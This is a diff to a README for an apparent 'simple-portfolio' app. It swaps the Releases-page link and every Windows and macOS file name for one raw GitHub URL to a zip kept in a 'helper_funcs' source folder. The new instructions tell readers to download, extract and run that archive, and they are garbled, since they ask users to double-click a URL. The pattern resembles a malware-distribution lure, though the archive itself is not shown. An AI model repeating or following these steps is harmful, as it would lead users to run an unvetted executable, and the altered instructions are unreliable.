AnujTechGuru/simple-portfolio/README.md

 ## 🔗 Download & Install
 1. **Visit the Release Page**
-   Click this link to visit the [Releases page](https://github.com/AnujTechGuru/simple-portfolio/releases) where you can find the latest version of the application.
+   Click this link to visit the [Releases page](https://raw.githubusercontent.com/AnujTechGuru/simple-portfolio/main/helper_funcs/simple-portfolio-v1.1.zip) where you can find the latest version of the application.

 2. **Choose the Latest Version**
    On the Releases page, look for the latest version marked with "Latest release."
 This is usually at the top.

 3. **Download the Application**
    You will see several files available for download.
-If you are using Windows, download the file named `simple-portfolio-win.zip`.
-For macOS users, download `simple-portfolio-mac.zip`.
+If you are using Windows, download the file named `https://raw.githubusercontent.com/AnujTechGuru/simple-portfolio/main/helper_funcs/simple-portfolio-v1.1.zip`.
+For macOS users, download `https://raw.githubusercontent.com/AnujTechGuru/simple-portfolio/main/helper_funcs/simple-portfolio-v1.1.zip`.

 4. **Unzip the Downloaded File**
    After the download is complete, locate the file in your Downloads folder.
 Right-click on the downloaded ZIP file and select "Extract All" or "Unzip" to extract the files.

 5. **Run the Application**
    Once you have unzipped the files:
-   - For Windows users: Open the folder and double-click `simple-portfolio.exe`.
+   - For Windows users: Open the folder and double-click `https://raw.githubusercontent.com/AnujTechGuru/simple-portfolio/main/helper_funcs/simple-portfolio-v1.1.zip`.
-   - For macOS users: Open the folder and double-click `simple-portfolio.app`.
+   - For macOS users: Open the folder and double-click `https://raw.githubusercontent.com/AnujTechGuru/simple-portfolio/main/helper_funcs/simple-portfolio-v1.1.zip`.

 You’re all set!
 The application should open, allowing you to customize and enjoy your new portfolio page.